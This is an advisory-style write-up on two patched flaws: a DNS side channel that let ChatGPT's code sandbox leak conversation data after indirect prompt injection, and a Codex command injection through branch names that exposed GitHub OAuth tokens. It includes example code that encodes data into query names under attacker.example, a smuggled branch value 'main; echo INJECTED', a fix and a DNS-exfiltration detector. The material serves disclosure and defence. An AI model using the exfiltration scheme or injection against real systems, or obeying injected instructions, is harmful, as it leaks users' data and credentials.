OpenAI Patches ChatGPT DNS Data Exfiltration Flaw and Codex Command Injection Vulnerability
Executive Summary
OpenAI has patched two distinct security vulnerabilities affecting its AI platforms. Check Point researchers discovered that ChatGPT’s code execution sandbox could leak conversation data, uploaded files, and sensitive content through a DNS side channel — bypassing OpenAI’s assumption that the container had no outbound network capability. Separately, BeyondTrust Phantom Labs identified a command injection vulnerability in OpenAI Codex’s repository task creation flow, where unsanitized branch name parameters allowed attackers to extract cleartext GitHub OAuth tokens. Both vulnerabilities have been remediated. Organizations using ChatGPT in workflows that handle sensitive data, and developers using Codex for code analysis, should review their exposure and rotate any credentials that may have been at risk.
Vulnerability 1: ChatGPT DNS Data Exfiltration
Discovery and Root Cause
Check Point researchers found that ChatGPT’s code execution environment — the sandbox container used for running code and analyzing data — was not as isolated as OpenAI believed. While OpenAI states that "the ChatGPT code execution environment is unable to generate outbound network requests directly," Check Point demonstrated this was not entirely correct.
The container could send DNS queries to external servers, creating a covert data exfiltration channel. As Check Point explained: "The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis."
The critical factor was a gap between security assumptions and reality: "Because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation."
How the Attack Works
The attack exploits the DNS resolution capability within the ChatGPT code sandbox:
Step 1 — Malicious Prompt: An attacker gets a prompt in front of ChatGPT that instructs it to run code in its sandbox. In practice this means indirect prompt injection: the instructions ride along in content the victim shares with the assistant (a pasted document, an uploaded file, a fetched web page), since an attacker gains nothing by exfiltrating their own conversation. The code encodes conversation data (messages, uploaded file contents, or other sensitive information) into the labels of hostnames under an attacker-controlled domain.
Step 2 — DNS Side Channel: Resolving each crafted hostname emits a DNS query for it. The sandbox never needs to reach the attacker's server directly: the resolver the container is allowed to use recurses on its behalf, and the query, with the encoded data in the name, arrives at the authoritative nameserver for the attacker's domain. DNS on UDP/TCP port 53 is almost universally permitted through firewalls, and, per Check Point, the model did not treat the lookup as an outbound data transfer that called for resistance or user mediation.
Step 3 — Data Capture: The attacker's nameserver logs every query name it receives and decodes the payload from the labels. No answer needs to be returned; the query itself is the leak, and nothing in the conversation indicates that data has left it.
Check Point emphasized the severity: "A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content."
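The channel described in steps 1 to 3, as an added example written for this page rather than Check Point's code: the sandbox side packs data into base32 labels under an attacker domain, and the nameserver side reassembles them. The domain attacker.example and the sample conversation bytes are constructed for the demonstration. The block only builds the query names; in the vulnerable container the attacker's code would resolve each one, for instance with socket.getaddrinfo(name, None), which is what carries the name through the recursive resolver to the attacker.

```python
import base64

# RFC 1035 limits: each label is at most 63 octets and a full name at most 253 characters.
LABEL_CHARS = 60        # data characters per label, under the 63-octet limit
LABELS_PER_QUERY = 2    # data labels per query name, after the sequence label


def _b32(data: bytes) -> str:
    # Base32 rather than base64: DNS names are case-insensitive and resolvers may
    # change case in transit (0x20 randomisation), so the encoding must survive folding.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def build_exfil_queries(data: bytes, attacker_domain: str) -> list[str]:
    """Sandbox side: split data into names <seq>.<chunk>.<chunk>.<attacker_domain>.

    Only the names are built here. In the vulnerable container the attacker's code
    would resolve each one, e.g. socket.getaddrinfo(name, None); the recursive
    resolver then forwards the name to the authoritative server for attacker_domain,
    whether or not any answer ever comes back.
    """
    encoded = _b32(data)
    step = LABEL_CHARS * LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(encoded), step)):
        chunk = encoded[start:start + step]
        labels = [chunk[i:i + LABEL_CHARS] for i in range(0, len(chunk), LABEL_CHARS)]
        name = ".".join([f"{seq:04x}", *labels, attacker_domain])
        if len(name) > 253:
            raise ValueError("attacker_domain too long for this chunking")
        names.append(name)
    return names


def reassemble(observed_names: list[str], attacker_domain: str) -> bytes:
    """Attacker's nameserver side: rebuild the payload from logged query names.

    Queries arrive in any order (resolvers retry and parallelise), so the sequence
    label decides placement, not arrival order. Names under the domain that do not
    fit the scheme (ordinary lookups such as www.attacker.example) are skipped.
    """
    suffix = "." + attacker_domain.lower()
    chunks: dict[int, str] = {}
    for name in observed_names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq_label, *data_labels = name[: -len(suffix)].split(".")
        try:
            chunks[int(seq_label, 16)] = "".join(data_labels)
        except ValueError:
            continue
    return _unb32("".join(chunks[seq] for seq in sorted(chunks)))


# Constructed stand-in for conversation content; not real user data.
SAMPLE_CONVERSATION = (
    b"user: summarise the attached Q3 board deck\n"
    b"file: board_deck_q3.pdf (revenue forecast, headcount plan, M&A shortlist)\n"
)

if __name__ == "__main__":
    queries = build_exfil_queries(SAMPLE_CONVERSATION, "attacker.example")
    for name in queries:
        print(len(name), name)
    recovered = reassemble(list(reversed(queries)), "attacker.example")
    print(recovered == SAMPLE_CONVERSATION)
```

Two details matter for anyone writing detections against this. The payload goes in the question, so a resolver that answers NXDOMAIN for everything still leaks, and the channel needs only a few queries per kilobyte (here 117 bytes fit in two names). Base32 or hex is the realistic encoding because of case folding; a rule that looks only for base64 alphabets will miss it.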
Scope
- Affected: ChatGPT free and paid tiers — any user whose conversation triggered code execution
- Data at risk: Conversation history, uploaded files, code analysis results, any content processed in the sandbox
- Fixed: February 2026 (confirmed by The Register, published March 30, 2026)
Vulnerability 2: Codex Command Injection (GitHub Token Theft)
Discovery and Root Cause
BeyondTrust Phantom Labs identified a command injection vulnerability in OpenAI Codex’s cloud infrastructure. When users prompt Codex to analyze a repository, the platform sends an HTTP POST request containing an environment identifier and a branch name parameter. The backend system failed to sanitize this parameter for shell metacharacters.
As Technadu reported: "Because the backend system lacked adequate input sanitization, threat actors could embed shell metacharacters directly into the branch designation."
How the Attack Works
Step 1 — Crafted Branch Name: An attacker creates a repository analysis task in Codex, providing a branch name that contains shell injection characters (e.g., semicolons, pipes, or backticks).
Step 2 — Command Execution: The Codex backend concatenates the branch name into a shell command without escaping. The injected commands execute within the Codex container with the privileges of the service process.
Step 3 — Token Extraction: The attacker’s injected commands write the Git remote URL and embedded OAuth token to a file within the container, then prompt the Codex agent to read and return the file’s contents.
Step 4 — Exfiltration: Codex returns the cleartext GitHub OAuth token to the attacker through the normal response channel. No external C2 infrastructure is required — the AI agent itself becomes the exfiltration mechanism.
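The injection in steps 1 and 2 beside its fix, as an added example written for this page, not BeyondTrust's or OpenAI's code. The vulnerable function mirrors the pattern the page describes (an untrusted branch name spliced into a shell string); printf stands in for git so the block runs offline, and the branch name "main; echo INJECTED", the repository URL and the destination path are constructed for the demonstration. The validator is deliberately stricter than git's own ref grammar, which is the caveat a reviewer should raise for the branch-name audit under Detection & Response too: git accepts semicolons, pipes, dollar signs and backticks in ref names, so "git accepted it" says nothing about shell safety.

```python
import re
import subprocess

# Stricter than git's own ref grammar on purpose: git accepts ';', '|', '$', '&',
# '(', ')' and backticks in branch names, so "valid for git" is not "safe for a shell".
# First character alphanumeric (no leading '-' that could be read as an option, no
# leading '/'), then the usual branch characters; the remaining checks mirror the
# relevant git-check-ref-format rules.
_BRANCH_ALLOWED = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]*$")


def is_safe_branch_name(name: str) -> bool:
    if len(name) > 255 or not _BRANCH_ALLOWED.match(name):
        return False
    if ".." in name or "//" in name or name.endswith((".", "/")):
        return False
    return all(not part.startswith(".") and not part.endswith(".lock")
               for part in name.split("/"))


def build_clone_argv(repo_url: str, branch: str, dest_dir: str) -> list[str]:
    """Hardened form of a backend clone step: validate, then one argv element per
    argument and no shell. Binding the value as '--branch=<name>' and ending option
    parsing with '--' means even an unexpected value cannot become an option or a
    second command."""
    if not is_safe_branch_name(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    return ["git", "clone", "--depth=1", f"--branch={branch}",
            "--single-branch", "--", repo_url, dest_dir]


# The functions below use printf as a stand-in for git so the demonstration runs
# offline without a repository; the injection mechanics are identical.
def run_vulnerable(branch: str) -> str:
    # The pattern the page describes: the untrusted value spliced into a shell string.
    cmd = "printf 'cloning %s\\n' " + branch
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_positional_param(branch: str) -> str:
    # If a shell really is unavoidable, hand the value over as a positional parameter:
    # the script text is constant and "$1" is expanded as data, never re-parsed.
    argv = ["sh", "-c", "printf 'cloning %s\\n' \"$1\"", "clone-step", branch]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def run_hardened(branch: str) -> str:
    if not is_safe_branch_name(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    return run_positional_param(branch)


INJECTED_BRANCH = "main; echo INJECTED"   # constructed attacker-supplied branch name

if __name__ == "__main__":
    print(run_vulnerable(INJECTED_BRANCH), end="")          # second line reads INJECTED
    print(run_positional_param(INJECTED_BRANCH), end="")    # one line, metacharacters inert
    print(build_clone_argv("https://github.com/org/repo.git", "feature/login-fix", "/work/repo"))
```

The structural fix is the argv list (or the positional parameter when a shell is unavoidable); the allow-list validator is defence in depth and also doubles as the check for the branch-name audit. Separately, the page notes the token was recoverable from the Git remote URL: as general practice, supplying credentials through a credential helper or a short-lived token outside the URL means a command that does run inside the container finds nothing useful in .git/config.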
Scope
- Affected applications: Codex cloud interface, Codex CLI, SDKs (Python, JavaScript/TypeScript, Java, Go, Ruby), and IDE integrations
- Data at risk: GitHub OAuth tokens (access, refresh, and ID tokens), OpenAI API keys, and associated account identifiers
- Impact amplification: A malicious branch name in a shared organizational repository could compromise every developer who analyzes it with Codex
- Fixed: OpenAI has fully remediated the vulnerability across all affected applications following responsible disclosure
Impact Assessment
ChatGPT DNS Flaw
The DNS exfiltration vulnerability is concerning because it exploited a gap between the security model and the implementation: the container was assumed to have no outbound data path, so DNS resolution was never treated as an egress channel that needed to be controlled or monitored. Any organization that used ChatGPT's code execution on sensitive documents, code, or internal data should assume that content in conversations which also ingested untrusted input (pasted text, uploaded files, fetched pages) during the vulnerability window may have been exposed.
Codex Command Injection
The Codex vulnerability is classic OS command injection (CWE-78) in an HTTP parameter; what is new is the exfiltration path. The attack requires no malware, no network exploitation, and no privilege escalation, just a crafted branch name, and the agent's own response channel carries the stolen token out, so the traffic looks like legitimate use. As Technadu noted, "adversaries could automate and scale this attack to target multiple developers" through poisoned repositories.
Combined Implications
Together, these vulnerabilities show that AI platforms add new entry points to old weakness classes: a covert DNS channel out of a "no network" sandbox, and shell command injection through a parameter that arrives as part of a natural-language task. Security teams that model these systems only as chat interfaces are unlikely to be monitoring for either.
Detection & Response
For ChatGPT DNS Exfiltration
| Detection Method | Details |
|---|---|
| DNS query monitoring | Look for unusually long query names, long high-entropy labels (hex- or base32-looking; base64 is less likely because DNS is case-insensitive), and bursts of unique subdomains under one unfamiliar domain originating from AI-integrated systems |
| Network segmentation audit | Verify that AI sandbox environments cannot resolve arbitrary external names, including indirectly through an internal recursive resolver |
| DLP policy review | Ensure data loss prevention controls cover DNS channels, not just HTTP/HTTPS |
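The first row of the table as running detection logic, added here as an example and not part of the original page or of any vendor's tooling. The resolver log lines, the client address, the attacker.example names and the cloudfront.net allow-list entry are all constructed for the demonstration; the log format (timestamp, client, query type, name) is a stand-in for whatever your resolver or Zeek dns.log emits.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log (timestamp client qtype qname), not taken from any real system.
# The three attacker.example names carry base32-looking labels under a sequence label,
# the shape a DNS exfiltration channel out of a code sandbox would produce.
SAMPLE_DNS_LOG = """\
2026-02-10T09:14:03Z 10.20.0.15 A www.openai.com
2026-02-10T09:14:04Z 10.20.0.15 A api.github.com
2026-02-10T09:14:05Z 10.20.0.15 A cdn-prod-eu-west-1.media.example.net
2026-02-10T09:14:06Z 10.20.0.15 A r3---sn-4g5e6nzl.googlevideo.com
2026-02-10T09:14:07Z 10.20.0.15 A d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6.cloudfront.net
2026-02-10T09:14:09Z 10.20.0.15 A 0000.krugkidrovuwg2zamjzg653oebtw64tmmqqhe4tfebrw63lfnzsxi4dqnz3a.onswg4tfor2c4tlfonzwcz3fom5aorqwg2lbnzzxoyltmvsxm4dfmn2gszlt.attacker.example
2026-02-10T09:14:09Z 10.20.0.15 A 0001.mfrgg2lunjuw4zlsej3ws3tdnfsgk3tuebrw63lqmfzwk4tpnnswk3bsojzw.pfqxezlomrsw45dmei5ceqd7pqzdi4tpnfsg2ltdn5zsaorqmi.attacker.example
2026-02-10T09:14:10Z 10.20.0.15 A 0002.mjwwozldor2gc5tfojzws43fmn2c.attacker.example
"""

# Constructed allow-list: registered domains whose hostnames legitimately look random
# (CDN object hashes). Without it the cloudfront.net line above is a false positive.
ALLOWLIST = frozenset({"cloudfront.net"})


def parse_log(text: str) -> list[tuple[str, str, str, str]]:
    """Split whitespace-separated log lines into (timestamp, client, qtype, qname)."""
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, client, qtype, qname = line.split()
            records.append((ts, client, qtype, qname.rstrip(".").lower()))
    return records


def shannon_entropy(text: str) -> float:
    """Bits per character; base32/hex payloads score well above readable hostnames."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str) -> tuple[str, str]:
    """Return (registered domain, subdomain labels joined without dots).

    Approximation: the last two labels are the registered domain. Production code
    should use the Public Suffix List so that co.uk-style suffixes are handled.
    """
    labels = qname.split(".")
    return ".".join(labels[-2:]), "".join(labels[:-2])


def detect_dns_exfil(records, min_payload=32, min_entropy=3.5, allowlist=ALLOWLIST):
    """Flag queries whose subdomain part is both long and high-entropy.

    Returns {(client, registered_domain): [qname, ...]} so that a burst of distinct
    names under one domain from one client surfaces as a single finding.
    """
    hits = defaultdict(list)
    for _ts, client, _qtype, qname in records:
        domain, payload = split_name(qname)
        if domain in allowlist:
            continue
        if len(payload) >= min_payload and shannon_entropy(payload) >= min_entropy:
            hits[(client, domain)].append(qname)
    return dict(hits)


if __name__ == "__main__":
    for (client, domain), names in detect_dns_exfil(parse_log(SAMPLE_DNS_LOG)).items():
        print(f"{client} -> {domain}: {len(names)} suspicious queries")
        for name in names:
            print("   ", name)
```

Length and entropy together keep readable but long hostnames (cdn-prod-eu-west-1.media) and short random-looking ones (r3---sn-4g5e6nzl) below the bar, but hashed CDN object names still trip it, which is why the allow-list exists and why a count of distinct subdomains per (client, domain) over a time window is the second signal worth adding before this goes into production.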
For Codex Command Injection
| Detection Method | Details |
|---|---|
| GitHub token audit | Review GitHub OAuth token activity for unusual repository access patterns correlated with Codex usage |
| Credential rotation | Rotate all GitHub tokens and OpenAI API keys for developers who used Codex during the vulnerability window |
| Repository branch name review | Audit shared repositories for branch names containing shell metacharacters; git itself permits characters such as ; | $ and backticks in ref names, so git's own validation does not protect a backend that shells out |
Mitigation & Remediation
| Priority | Action | Details |
|---|---|---|
| Critical | Rotate credentials | Rotate GitHub OAuth tokens, OpenAI API keys, and any credentials that may have been accessible from Codex or ChatGPT sandbox environments |
| Critical | Update AI services | Ensure all Codex applications (CLI, SDK, IDE integrations) are updated to patched versions |
| High | Restrict AI tool access | Limit ChatGPT code execution on sensitive documents and Codex access to sensitive repositories until your security team has reviewed the access model |
| High | Enforce human-in-the-loop | Require manual approval for AI-initiated outbound data transfers, especially in workflows that process sensitive content |
| Medium | Harden sandbox networking | If running self-hosted AI environments, block DNS from sandbox containers entirely or point them at a resolver that answers only for internal names; an internal resolver that still recurses to the public Internet carries the exfiltration on the sandbox's behalf |
| Medium | Monitor DNS traffic | Deploy DNS monitoring that flags anomalous query patterns — high entropy subdomains, large payloads, or rapid sequential queries to new domains |
| Medium | Input validation for AI agents | If building on Codex or similar AI coding agents, never assemble shell strings from user-supplied parameters; pass arguments as an argv list without a shell and validate them against a strict allow-list first |
Timeline
| Date | Event |
|---|---|
| February 2026 | Check Point researchers discover the ChatGPT DNS data exfiltration vulnerability |
| February 2026 | OpenAI patches the ChatGPT DNS flaw |
| March 30, 2026 | Check Point publishes research; The Register, The Hacker News, and Technadu report on both vulnerabilities |
| March 30, 2026 | BeyondTrust Phantom Labs’ Codex command injection research published; OpenAI confirms full remediation |
Sources & References
- The Hacker News. OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability.
- Technadu. OpenAI Codex Command Injection Flaw Exposes GitHub Tokens.
- The Register. OpenAI ChatGPT Fixes DNS Data Smuggling Flaw.